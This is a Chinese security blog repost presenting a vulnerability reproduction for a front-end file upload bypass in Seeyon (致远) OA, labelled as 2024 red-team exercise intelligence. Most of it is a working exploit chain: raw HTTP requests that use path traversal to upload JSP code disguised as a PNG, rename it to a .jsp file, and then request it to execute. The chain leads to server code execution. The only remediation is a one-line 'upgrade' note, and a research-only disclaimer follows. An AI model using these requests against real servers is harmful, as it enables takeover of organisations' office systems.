【2024HW情报】【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞

admin 2024年7月23日15:06:03评论125 views字数 1685阅读5分37秒阅读模式
致远OA系统在企业中具有广泛的应用和作用。它能够帮助企业打破部门壁垒,实现信息共享和协同办公,提高沟通效率和工作效率。通过流程审批管理,致远OA系统能够简化各类审批流程,降低管理成本和错误率。
【2024HW情报】【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞
漏洞描述
致远OA fileUpload.do 前台文件上传绕过漏洞,攻击者可通过构造恶意Payload执行并获取服务器系统权限。
【2024HW情报】【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞
漏洞复现
1、上传图片马,返回 fileid 值POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUploadHTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Type: multipart/form-data; boundary=00content0boundary00User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN)AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287c9dfb30)Content-Length: 754 --00content0boundary00Content-Disposition: form-data; name="type"--00content0boundary00Content-Disposition: form-data; name="extensions" png--00content0boundary00Content-Disposition: form-data; name="applicationCategory"--00content0boundary00Content-Disposition: form-data; name="destDirectory"--00content0boundary00Content-Disposition: form-data; name="destFilename"--00content0boundary00Content-Disposition: form-data; name="maxSize" --00content0boundary00Content-Disposition: form-data; name="isEncrypt" false--00content0boundary00 Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf <% out.println("hello");%> --00content0boundary00-- 2、修改文件后缀为 jspPOST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser;SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)Content-Length: 64 method=uploadMenuIcon&fileid=ID 值&filename=123.jsp 3、访问 jsp 文件触发恶意 jsp 代码/seeyon/main/menuIcon/123.jsp
【2024HW情报】【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞
修复建议
升级到安全版本!!!

原文始发于微信公众号(白帽攻防):【2024HW情报】【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月23日15:06:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【2024HW情报】【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞https://cn-sec.com/archives/2989747.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息